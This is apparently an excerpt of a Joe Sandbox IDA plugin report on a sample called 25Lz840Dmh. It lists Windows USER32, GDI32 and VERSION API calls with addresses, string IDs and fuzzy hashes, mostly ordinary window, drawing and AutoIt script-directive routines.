                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 3521893082-0
                                                  • Opcode ID: bd548776e0265ff885043a2e6e5d0d6fad268d175f2e90baacd3ba411d50931c
                                                  • Instruction ID: 066fb1db0400f009666823737ef16ea0482042732ffa4937fe10a01ab60882b7
                                                  • Opcode Fuzzy Hash: bd548776e0265ff885043a2e6e5d0d6fad268d175f2e90baacd3ba411d50931c
                                                  • Instruction Fuzzy Hash: 72916D72008305EFC7109F64DC88B5F7BA9FF88321F108A2DF9AA961A0D771D985CB52
                                                  APIs
                                                  • DestroyWindow.USER32(?,?,?), ref: 00BF2CA2
                                                  • DeleteObject.GDI32(00000000), ref: 00BF2CE8
                                                  • DeleteObject.GDI32(00000000), ref: 00BF2CF3
                                                  • DestroyIcon.USER32(00000000,?,?,?), ref: 00BF2CFE
                                                  • DestroyWindow.USER32(00000000,?,?,?), ref: 00BF2D09
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C2C43B
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C2C474
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C2C89D
                                                    • Part of subcall function 00BF1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00BF2036,?,00000000,?,?,?,?,00BF16CB,00000000,?), ref: 00BF1B9A
                                                  • SendMessageW.USER32(?,00001053), ref: 00C2C8DA
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C2C8F1
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2C907
                                                  • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C2C912
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: e7ad0be1a3d8ab2ba2a726f9da2d0cae033f8be55cc09d6e4fec1a2438f27023
                                                  • Instruction ID: 66f6cbd0c99485303dc797d9bcc1ba60189353b0b03b8cdbe5bd2043453133de
                                                  • Opcode Fuzzy Hash: e7ad0be1a3d8ab2ba2a726f9da2d0cae033f8be55cc09d6e4fec1a2438f27023
                                                  • Instruction Fuzzy Hash: 41127A30604215AFDB24DF24D8D4BADBBE1FF04300F5445A9F9A9CBA62C731E986DB91
                                                  APIs
                                                  • DestroyWindow.USER32(00000000), ref: 00C674DE
                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00C6759D
                                                  • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00C675DB
                                                  • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00C675ED
                                                  • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00C67633
                                                  • GetClientRect.USER32(00000000,?), ref: 00C6763F
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00C67683
                                                  • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00C67692
                                                  • GetStockObject.GDI32(00000011), ref: 00C676A2
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C676A6
                                                  • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00C676B6
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C676BF
                                                  • DeleteDC.GDI32(00000000), ref: 00C676C8
                                                  • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00C676F4
                                                  • SendMessageW.USER32(00000030,00000000,00000001), ref: 00C6770B
                                                  • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00C67746
                                                  • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00C6775A
                                                  • SendMessageW.USER32(00000404,00000001,00000000), ref: 00C6776B
                                                  • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00C6779B
                                                  • GetStockObject.GDI32(00000011), ref: 00C677A6
                                                  • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00C677B1
                                                  • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00C677BB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                  • API String ID: 2910397461-517079104
                                                  • Opcode ID: 738e8182d804665d3a24e45199e067e75fbfbd33bc5fc4e23a29ba8beab03828
                                                  • Instruction ID: 369037e909b081d9cb03f548ffeda8df2b8782849855536ebaba93c6d413c28a
                                                  • Opcode Fuzzy Hash: 738e8182d804665d3a24e45199e067e75fbfbd33bc5fc4e23a29ba8beab03828
                                                  • Instruction Fuzzy Hash: 18A15671A40619BFEB14DBA4DC89FAE77B9EF04714F004254FA15A72E0D770AD41CB64
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5AD1E
                                                  • GetDriveTypeW.KERNEL32(?,00C7FAC0,?,\\.\,00C7F910), ref: 00C5ADFB
                                                  • SetErrorMode.KERNEL32(00000000,00C7FAC0,?,\\.\,00C7F910), ref: 00C5AF59
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                   • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 5697ba5b596e75de712760df48ef660b23a7c74c5b5e9ec245b60bee079e8355
                                                  • Instruction ID: 01458c690e68de87f31499c4344673c4ee75ea6cdc8f4e9ebf319dba266570ae
                                                  • Opcode Fuzzy Hash: 5697ba5b596e75de712760df48ef660b23a7c74c5b5e9ec245b60bee079e8355
                                                  • Instruction Fuzzy Hash: A451DBB864410A9B8B00DB52CD42DBD73B0EF097067204376FC07A7191DA709E9EE76B
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: 4ee6919650cf594bce220ca16c1c625591c9b904bbe12a94e10b9e1ad14e3b6b
                                                  • Instruction ID: b1497138dafdb17dce47c45dfcc637031641877b1982237abc7b1976d98f4460
                                                  • Opcode Fuzzy Hash: 4ee6919650cf594bce220ca16c1c625591c9b904bbe12a94e10b9e1ad14e3b6b
                                                  • Instruction Fuzzy Hash: 39810CB06402197BCB24AA74ED82FBF37A8EF15704F044064FE056B1D6EB70DE59E6A1
                                                  APIs
                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00C79AD2
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00C79B8B
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00C79BA7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: 79fdbe313061be5fc19209d8b5866483d77f281967ca88ea4d5c0a020e4e40fb
                                                  • Instruction ID: d60ba85d1a8ca8d0e1f37c03e2a03c0236615bdc163cf6cf872789dbf6ce9ea0
                                                  • Opcode Fuzzy Hash: 79fdbe313061be5fc19209d8b5866483d77f281967ca88ea4d5c0a020e4e40fb
                                                  • Instruction Fuzzy Hash: 7202D070104301AFDB25CF25C889BAABBE5FF89314F04892DF9ADD62A1C735DA45CB52
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00C7A903
                                                  • SetTextColor.GDI32(?,?), ref: 00C7A907
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00C7A91D
                                                  • GetSysColor.USER32(0000000F), ref: 00C7A928
                                                  • CreateSolidBrush.GDI32(?), ref: 00C7A92D
                                                  • GetSysColor.USER32(00000011), ref: 00C7A945
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C7A953
                                                  • SelectObject.GDI32(?,00000000), ref: 00C7A964
                                                  • SetBkColor.GDI32(?,00000000), ref: 00C7A96D
                                                  • SelectObject.GDI32(?,?), ref: 00C7A97A
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00C7A999
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C7A9B0
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00C7A9C5
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C7A9ED
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00C7AA14
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00C7AA32
                                                  • DrawFocusRect.USER32(?,?), ref: 00C7AA3D
                                                  • GetSysColor.USER32(00000011), ref: 00C7AA4B
                                                  • SetTextColor.GDI32(?,00000000), ref: 00C7AA53
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00C7AA67
                                                  • SelectObject.GDI32(?,00C7A5FA), ref: 00C7AA7E
                                                  • DeleteObject.GDI32(?), ref: 00C7AA89
                                                  • SelectObject.GDI32(?,?), ref: 00C7AA8F
                                                  • DeleteObject.GDI32(?), ref: 00C7AA94
                                                  • SetTextColor.GDI32(?,?), ref: 00C7AA9A
                                                  • SetBkColor.GDI32(?,?), ref: 00C7AAA4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: d472099668f24442ee4f66633c9eb75d66a2721867910cf6a2b454ca2ffb9b4b
                                                  • Instruction ID: 9c126055e7ec2f2b8b25b7e5eddb3dc7153bdbc48bdd0d67ccd92e683ced4ba9
                                                  • Opcode Fuzzy Hash: d472099668f24442ee4f66633c9eb75d66a2721867910cf6a2b454ca2ffb9b4b
                                                  • Instruction Fuzzy Hash: 0E511E71900208EFDB119FA4DC88FAE7B79EF48320F118529F929AB2A1D6719991DB50
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00C78AC1
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C78AD2
                                                  • CharNextW.USER32(0000014E), ref: 00C78B01
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00C78B42
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00C78B58
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00C78B69
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00C78B86
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C78BD8
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00C78BEE
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C78C1F
                                                  • _memset.LIBCMT ref: 00C78C44
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00C78C8D
                                                  • _memset.LIBCMT ref: 00C78CEC
                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00C78D16
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00C78D6E
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00C78E1B
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00C78E3D
                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C78E87
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00C78EB4
                                                  • DrawMenuBar.USER32(?), ref: 00C78EC3
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00C78EEB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 6273fa97ad9f27dd6d50c6b6d25d9db600dcc8725342f0eca70704d53c734f60
                                                  • Instruction ID: 8e29e5855083ad007e65f806b38ab2a7b143ea401456f557cfc1b9048e8fea18
                                                  • Opcode Fuzzy Hash: 6273fa97ad9f27dd6d50c6b6d25d9db600dcc8725342f0eca70704d53c734f60
                                                  • Instruction Fuzzy Hash: 9EE16374940218AFDF219F55CC89FEE7B79FF05720F10815AFA29AA190DB708A85DF60
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00C749CA
                                                  • GetDesktopWindow.USER32 ref: 00C749DF
                                                  • GetWindowRect.USER32(00000000), ref: 00C749E6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C74A48
                                                  • DestroyWindow.USER32(?), ref: 00C74A74
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00C74A9D
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00C74ABB
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00C74AE1
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00C74AF6
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00C74B09
                                                  • IsWindowVisible.USER32(?), ref: 00C74B29
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00C74B44
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00C74B58
                                                  • GetWindowRect.USER32(?,?), ref: 00C74B70
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00C74B96
                                                  • GetMonitorInfoW.USER32(00000000,?), ref: 00C74BB0
                                                  • CopyRect.USER32(?,?), ref: 00C74BC7
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00C74C32
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 24400f2fbef79c9b39042847ffb35f3115dfc7ebb810a2bb07ab53e5d0cb276c
                                                  • Instruction ID: e5961cf3e48ee9b700e02b959159329516398db1553abb44a641eed4571153c7
                                                  • Opcode Fuzzy Hash: 24400f2fbef79c9b39042847ffb35f3115dfc7ebb810a2bb07ab53e5d0cb276c
                                                  • Instruction Fuzzy Hash: 05B17A71608340AFDB08DF65C889B6ABBE4FF88310F00891CF5A99B2A1D771ED45CB95
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00C544AC
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00C544D2
                                                  • _wcscpy.LIBCMT ref: 00C54500
                                                  • _wcscmp.LIBCMT ref: 00C5450B
                                                  • _wcscat.LIBCMT ref: 00C54521
                                                  • _wcsstr.LIBCMT ref: 00C5452C
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00C54548
                                                  • _wcscat.LIBCMT ref: 00C54591
                                                  • _wcscat.LIBCMT ref: 00C54598
                                                  • _wcsncpy.LIBCMT ref: 00C545C3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 0436895d88d51303886eccf68dfefd58b4a78318654a6b2c676f99f64076437c
                                                  • Instruction ID: 6b16daee14d45e8f57e572e2a20a03715dd812e2a3817485533fdaaa0fd11750
                                                  • Opcode Fuzzy Hash: 0436895d88d51303886eccf68dfefd58b4a78318654a6b2c676f99f64076437c
                                                  • Instruction Fuzzy Hash: 034103359002047BEB14AB75DC47FFF77ACDF42714F10006AF904A6182EA749AD2B6A9
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF28BC
                                                  • GetSystemMetrics.USER32(00000007), ref: 00BF28C4
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00BF28EF
                                                  • GetSystemMetrics.USER32(00000008), ref: 00BF28F7
                                                  • GetSystemMetrics.USER32(00000004), ref: 00BF291C
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00BF2939
                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00BF2949
                                                  • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00BF297C
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00BF2990
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00BF29AE
                                                  • GetStockObject.GDI32(00000011), ref: 00BF29CA
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF29D5
                                                    • Part of subcall function 00BF2344: GetCursorPos.USER32(?), ref: 00BF2357
                                                    • Part of subcall function 00BF2344: ScreenToClient.USER32(00CB57B0,?), ref: 00BF2374
                                                    • Part of subcall function 00BF2344: GetAsyncKeyState.USER32(00000001), ref: 00BF2399
                                                    • Part of subcall function 00BF2344: GetAsyncKeyState.USER32(00000002), ref: 00BF23A7
                                                  • SetTimer.USER32(00000000,00000000,00000028,00BF1256), ref: 00BF29FC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 871e074377d76ff8caa264dcf2b3c517a75281d477bad361a94c09425905a148
                                                  • Instruction ID: 14b6de48b36d9e239f723d8e30f3416b76610f93ec22b494166bdd6dd4c5c6c3
                                                  • Opcode Fuzzy Hash: 871e074377d76ff8caa264dcf2b3c517a75281d477bad361a94c09425905a148
                                                  • Instruction Fuzzy Hash: 8AB16C71A4020AEFDB15DFA8DC95BAE7BF5FB08310F104229FA15A72E0DB74A951CB50
                                                  APIs
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C4A47A
                                                  • __swprintf.LIBCMT ref: 00C4A51B
                                                  • _wcscmp.LIBCMT ref: 00C4A52E
                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00C4A583
                                                  • _wcscmp.LIBCMT ref: 00C4A5BF
                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00C4A5F6
                                                  • GetDlgCtrlID.USER32(?), ref: 00C4A648
                                                  • GetWindowRect.USER32(?,?), ref: 00C4A67E
                                                  • GetParent.USER32(?), ref: 00C4A69C
                                                  • ScreenToClient.USER32(00000000), ref: 00C4A6A3
                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00C4A71D
                                                  • _wcscmp.LIBCMT ref: 00C4A731
                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00C4A757
                                                  • _wcscmp.LIBCMT ref: 00C4A76B
                                                    • Part of subcall function 00C1362C: _iswctype.LIBCMT ref: 00C13634
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                  • String ID: %s%u
                                                  • API String ID: 3744389584-679674701
                                                  • Opcode ID: 36f20fa03e50c39809a4743281ee1caf3d5a8913d72a7daba2fccfebdb3b2b8a
                                                  • Instruction ID: 4c329031c7b06ad0c457cd482a49b19bf87a1e840313d043eabee60bc40a771d
                                                  • Opcode Fuzzy Hash: 36f20fa03e50c39809a4743281ee1caf3d5a8913d72a7daba2fccfebdb3b2b8a
                                                  • Instruction Fuzzy Hash: 63A1B271244706BFDB14DF64C884BEAB7E8FF44354F008529F9A9D2190DB30EA96DB92
                                                  APIs
                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00C4AF18
                                                  • _wcscmp.LIBCMT ref: 00C4AF29
                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00C4AF51
                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00C4AF6E
